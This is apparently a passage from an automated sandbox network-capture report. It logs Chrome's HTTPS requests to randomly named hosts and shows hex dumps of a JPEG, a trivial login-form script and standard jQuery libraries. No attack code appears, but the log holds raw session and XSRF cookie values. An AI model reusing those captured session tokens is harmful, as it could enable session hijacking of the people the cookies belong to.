                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
                                                      2025-01-12 23:47:48 UTC1141INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:48 GMT
                                                      Content-Type: image/jpeg
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Cache-Control: max-age=315360000
                                                      Pragma: no-cache
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IjFzNTJBYWlhUVE2cm9IaVFueENOV2c9PSIsInZhbHVlIjoiYUc5ZDZYYWI2MHNkaERZRzlGWmYzcDI5RU1Tak5xZkZhbmJ2aERFSVo2WHFjaVFwWENHVGtUR2c3TDVJRUord3lwVWtNUjR0cmhMcnhqS0VlYVkxOWc9PSIsIm1hYyI6IjlkOTRmMGQyZTFjMjk0OWZjN2MxNWE4NDEzN2RmN2QxZWRkOTRjYjc5NmI0OGY0MWJkMzk4NjVkOTczNGMyMzIifQ%3D%3D; expires=Mon, 13-Jan-2025 01:47:48 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                      Set-Cookie: vanguard_session=eyJpdiI6InFxdUZ6ek0zT2J2bzY4VWt6WXJhVUE9PSIsInZhbHVlIjoiS1wvcUtlNnpZRkgwcUUwUm41RUdOTHo1aTNNeWZZR3lDQUtpNDhXeXlcLzdDMks2QmhDQ1wvbStXSEkxVUtzZFA3OUxRbFFxM1dER3RkemFlY2VGVlJVRkE9PSIsIm1hYyI6ImM3Zjg4MzBlNGE0OGJmZTQ0OTM5ZWQzODRlOGQxNjJhMmQwMmQ4NWZhODI5YWE4MGRkMGM0ZjI0OWQ2MWE3YzUifQ%3D%3D; expires=Mon, 13-Jan-2025 01:47:48 GMT; Max-Age=7200; path=/; secure; httponly; samesite=none
                                                      Server: nginx
                                                      2025-01-12 23:47:48 UTC1058INData Raw: 34 31 36 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3e 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 36 32 29 2c 20 64 65 66 61 75 6c 74 20 71 75 61 6c 69 74 79 0a ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 00 17 00 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01
                                                      Data Ascii: 416JFIF``>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default qualityC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.44978220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:47 UTC630OUTGET /js/www/login.js?ver=1606790076 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:48 UTC314INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:48 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 191
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:34:36 GMT
                                                      ETag: "5fc5abbc-bf"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:48 UTC191INData Raw: 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 0d 0a 09 24 28 27 23 6c 6f 67 69 6e 46 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 09 20 20 20 20 24 28 74 68 69 73 29 2e 63 68 69 6c 64 72 65 6e 28 27 23 6c 6f 67 69 6e 53 75 62 27 29 2e 70 72 6f 70 28 27 64 69 73 61 62 6c 65 64 27 2c 20 74 72 75 65 29 3b 0d 0a 09 7d 29 3b 0d 0a 0d 0a 09 24 28 22 23 6c 6f 67 69 6e 53 75 62 22 29 2e 70 72 6f 70 28 27 64 69 73 61 62 6c 65 64 27 2c 20 66 61 6c 73 65 29 3b 0d 0a 0d 0a 7d 29 3b
                                                      Data Ascii: jQuery(document).ready(function() {$('#loginForm').submit(function(){ $(this).children('#loginSub').prop('disabled', true);});$("#loginSub").prop('disabled', false);});


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.44978320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:48 UTC385OUTGET /plus/plugin/js/jquery.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC319INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:48 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 84345
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-14979"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:49 UTC3777INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 31 2e 34 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 35 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64
                                                      Data Ascii: /*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a wind
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 67 75 6d 65 6e 74 73 2c 32 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 62 7c 7c 74 68 69 73 2c 65 2e 63 6f 6e 63 61 74 28 64 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 29 7d 2c 66 2e 67 75 69 64 3d 61 2e 67 75 69 64 3d 61 2e 67 75 69 64 7c 7c 6e 2e 67 75 69 64 2b 2b 2c 66 29 3a 76 6f 69 64 20 30 7d 2c 6e 6f 77 3a 44 61 74 65 2e 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6b 7d 29 2c 6e 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 68 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b
                                                      Data Ascii: guments,2),f=function(){return a.apply(b||this,e.concat(d.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:k}),n.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 5d 3d 63 5b 65 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 70
                                                      Data Ascii: {return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function p
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 21 3d 3d 6e 26 26 6d 28 61 29 2c 62 3d 62 2e 72 65 70 6c 61 63 65 28 55 2c 22 3d 27 24 31 27 5d 22 29 2c 21 28 21 63 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 21 70 7c 7c 72 26 26 72 2e 74 65 73 74 28 62 29 7c 7c 71 26 26 71 2e 74 65 73 74 28 62 29 29 29 74 72 79 7b 76 61 72 20 64 3d 73 2e 63 61 6c 6c 28 61 2c 62 29 3b 69 66 28 64 7c 7c 63 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 7c 7c 61 2e 64 6f 63 75 6d 65 6e 74 26 26 31 31 21 3d 3d 61 2e 64 6f 63 75 6d 65 6e 74 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 20 64 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 67 61 28 62 2c 6e 2c 6e 75 6c 6c 2c 5b 61 5d 29 2e 6c 65 6e 67 74 68 3e 30 7d 2c 67 61 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e
                                                      Data Ascii: Document||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return ga(b,n,null,[a]).length>0},ga.contains=fun
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3d 61 2e 72 65 70 6c 61 63 65 28 63 61 2c 64 61 29 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 2e 74 65 78 74 43 6f 6e 74 65 6e 74 7c 7c 62 2e 69 6e 6e 65 72 54 65 78 74 7c 7c 65 28 62 29 29 2e 69 6e 64 65 78 4f 66 28 61 29 3e 2d 31 7d 7d 29 2c 6c 61 6e 67 3a 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 57 2e 74 65 73 74 28 61 7c 7c 22 22 29 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 6c 61 6e 67 3a 20 22 2b 61 29 2c 61 3d 61 2e 72 65 70 6c 61 63 65 28 63 61 2c 64 61 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3b 64 6f 20 69 66 28 63 3d 70 3f 62 2e 6c 61 6e 67 3a 62 2e 67 65 74 41 74 74 72
                                                      Data Ascii: ion(a){return a=a.replace(ca,da),function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:ia(function(a){return W.test(a||"")||ga.error("unsupported lang: "+a),a=a.replace(ca,da).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttr
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 5b 69 5d 2e 74 79 70 65 5d 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 5b 69 5d 2e 6d 61 74 63 68 65 73 29 2c 63 5b 75 5d 29 7b 66 6f 72 28 65 3d 2b 2b 69 3b 66 3e 65 3b 65 2b 2b 29 69 66 28 64 2e 72 65 6c 61 74 69 76 65 5b 61 5b 65 5d 2e 74 79 70 65 5d 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 77 61 28 69 3e 31 26 26 74 61 28 6d 29 2c 69 3e 31 26 26 72 61 28 61 2e 73 6c 69 63 65 28 30 2c 69 2d 31 29 2e 63 6f 6e 63 61 74 28 7b 76 61 6c 75 65 3a 22 20 22 3d 3d 3d 61 5b 69 2d 32 5d 2e 74 79 70 65 3f 22 2a 22 3a 22 22 7d 29 29 2e 72 65 70 6c 61 63 65 28 52 2c 22 24 31 22 29 2c 63 2c 65 3e 69 26 26 78 61 28 61 2e 73 6c 69 63 65 28 69 2c 65 29 29 2c 66 3e 65 26 26 78 61 28 61 3d 61 2e 73 6c 69 63 65 28 65 29 29 2c 66 3e 65 26 26 72 61 28 61 29 29 7d 6d 2e 70 75 73
                                                      Data Ascii: [i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return wa(i>1&&ta(m),i>1&&ra(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&xa(a.slice(i,e)),f>e&&xa(a=a.slice(e)),f>e&&ra(a))}m.pus
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 3a 74 68 69 73 2e 61 74 74 72 28 63 2c 62 5b 63 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 72 65 74 75 72 6e 20 64 3d 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 63 5b 32 5d 29 2c 64 26 26 64 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 74 68 69 73 2e 6c 65 6e 67 74 68 3d 31 2c 74 68 69 73 5b 30 5d 3d 64 29 2c 74 68 69 73 2e 63 6f 6e 74 65 78 74 3d 6c 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 3d 61 2c 74 68 69 73 7d 72 65 74 75 72 6e 20 61 2e 6e 6f 64 65 54 79 70 65 3f 28 74 68 69 73 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 5b 30 5d 3d 61 2c 74 68 69 73 2e 6c 65 6e 67 74 68 3d 31 2c 74 68 69 73 29 3a 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 3f 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 79 2e 72 65 61 64 79 3f 79 2e 72 65 61 64 79
                                                      Data Ascii: :this.attr(c,b[c]);return this}return d=l.getElementById(c[2]),d&&d.parentNode&&(this.length=1,this[0]=d),this.context=l,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):n.isFunction(a)?"undefined"!=typeof y.ready?y.ready
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 67 26 26 67 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 61 26 26 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 2e 70 72 6f 6d 69 73 65 29 3f 61 2e 70 72 6f 6d 69 73 65 28 29 2e 64 6f 6e 65 28 63 2e 72 65 73 6f 6c 76 65 29 2e 66 61 69 6c 28 63 2e 72 65 6a 65 63 74 29 2e 70 72 6f 67 72 65 73 73 28 63 2e 6e 6f 74 69 66 79 29 3a 63 5b 66 5b 30 5d 2b 22 57 69 74 68 22 5d 28 74 68 69 73 3d 3d 3d 64 3f 63 2e 70 72 6f 6d 69 73 65 28 29 3a 74 68 69 73 2c 67 3f 5b 61 5d 3a 61 72 67 75 6d 65 6e 74 73 29 7d 29 7d 29 2c 61 3d 6e 75 6c 6c 7d 29 2e 70 72 6f 6d 69 73 65 28 29 7d 2c 70 72 6f 6d 69 73 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 3f 6e 2e 65 78
                                                      Data Ascii: (function(){var a=g&&g.apply(this,arguments);a&&n.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?n.ex
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 22 29 26 26 28 64 3d 6e 2e 63 61 6d 65 6c 43 61 73 65 28 64 2e 73 6c 69 63 65 28 35 29 29 2c 50 28 66 2c 64 2c 65 5b 64 5d 29 29 29 3b 4c 2e 73 65 74 28 66 2c 22 68 61 73 44 61 74 61 41 74 74 72 73 22 2c 21 30 29 7d 72 65 74 75 72 6e 20 65 7d 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4d 2e 73 65 74 28 74 68 69 73 2c 61 29 7d 29 3a 4a 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 2c 64 3d 6e 2e 63 61 6d 65 6c 43 61 73 65 28 61 29 3b 69 66 28 66 26 26 76 6f 69 64 20 30 3d 3d 3d 62 29 7b 69 66 28 63 3d 4d 2e 67 65 74 28 66 2c 61 29 2c 76 6f 69 64 20 30 21 3d 3d 63 29 72 65 74 75 72 6e 20 63 3b 69 66 28
                                                      Data Ascii: ndexOf("data-")&&(d=n.camelCase(d.slice(5)),P(f,d,e[d])));L.set(f,"hasDataAttrs",!0)}return e}return"object"==typeof a?this.each(function(){M.set(this,a)}):J(this,function(b){var c,d=n.camelCase(a);if(f&&void 0===b){if(c=M.get(f,a),void 0!==c)return c;if(
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 74 65 61 72 64 6f 77 6e 2e 63 61 6c 6c 28 61 2c 70 2c 72 2e 68 61 6e 64 6c 65 29 21 3d 3d 21 31 7c 7c 6e 2e 72 65 6d 6f 76 65 45 76 65 6e 74 28 61 2c 6f 2c 72 2e 68 61 6e 64 6c 65 29 2c 64 65 6c 65 74 65 20 69 5b 6f 5d 29 7d 65 6c 73 65 20 66 6f 72 28 6f 20 69 6e 20 69 29 6e 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 61 2c 6f 2b 62 5b 6a 5d 2c 63 2c 64 2c 21 30 29 3b 6e 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 69 29 26 26 28 64 65 6c 65 74 65 20 72 2e 68 61 6e 64 6c 65 2c 4c 2e 72 65 6d 6f 76 65 28 61 2c 22 65 76 65 6e 74 73 22 29 29 7d 7d 2c 74 72 69 67 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 2c 65 29 7b 76 61 72 20 66 2c 67 2c 68 2c 69 2c 6b 2c 6d 2c 6f 2c 70 3d 5b 64 7c 7c 6c 5d 2c 71 3d 6a 2e 63 61 6c 6c 28 62 2c 22 74 79 70 65 22 29
                                                      Data Ascii: teardown.call(a,p,r.handle)!==!1||n.removeEvent(a,o,r.handle),delete i[o])}else for(o in i)n.event.remove(a,o+b[j],c,d,!0);n.isEmptyObject(i)&&(delete r.handle,L.remove(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,m,o,p=[d||l],q=j.call(b,"type")


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.44978620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:48 UTC393OUTGET /plus/plugin/js/jquery-migrate.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC317INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:48 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 7199
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1c1f"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:49 UTC3779INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 31 2e 32 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 33 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 76 61 72 20 72 3d 74 2e 63 6f 6e 73 6f 6c 65 3b 69 5b 6e 5d 7c 7c 28 69 5b 6e 5d 3d 21 30 2c 65 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 2e 70 75 73 68 28 6e 29 2c 72
                                                      Data Ascii: /*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r
                                                      2025-01-12 23:47:49 UTC3420INData Raw: 73 74 72 75 63 74 6f 72 3d 74 2c 74 2e 73 75 62 3d 74 68 69 73 2e 73 75 62 2c 74 2e 66 6e 2e 69 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 61 29 7b 72 65 74 75 72 6e 20 61 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 26 26 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 26 26 28 61 3d 74 28 61 29 29 2c 65 2e 66 6e 2e 69 6e 69 74 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 61 2c 6e 29 7d 2c 74 2e 66 6e 2e 69 6e 69 74 2e 70 72 6f 74 6f 74 79 70 65 3d 74 2e 66 6e 3b 76 61 72 20 6e 3d 74 28 64 6f 63 75 6d 65 6e 74 29 3b 72 65 74 75 72 6e 20 72 28 22 6a 51 75 65 72 79 2e 73 75 62 28 29 20 69 73 20 64 65 70 72 65 63 61 74 65 64 22 29 2c 74 7d 2c 65 2e 61 6a 61 78 53 65 74 75 70 28 7b 63 6f 6e 76 65 72 74 65 72 73 3a 7b 22 74 65 78 74 20 6a 73 6f 6e 22 3a 65
                                                      Data Ascii: structor=t,t.sub=this.sub,t.fn.init=function(r,a){return a&&a instanceof e&&!(a instanceof t)&&(a=t(a)),e.fn.init.call(this,r,a,n)},t.fn.init.prototype=t.fn;var n=t(document);return r("jQuery.sub() is deprecated"),t},e.ajaxSetup({converters:{"text json":e


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.44978420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:48 UTC385OUTGET /plus/js/custom/checkinput.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC318INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 15380
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-3c14"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
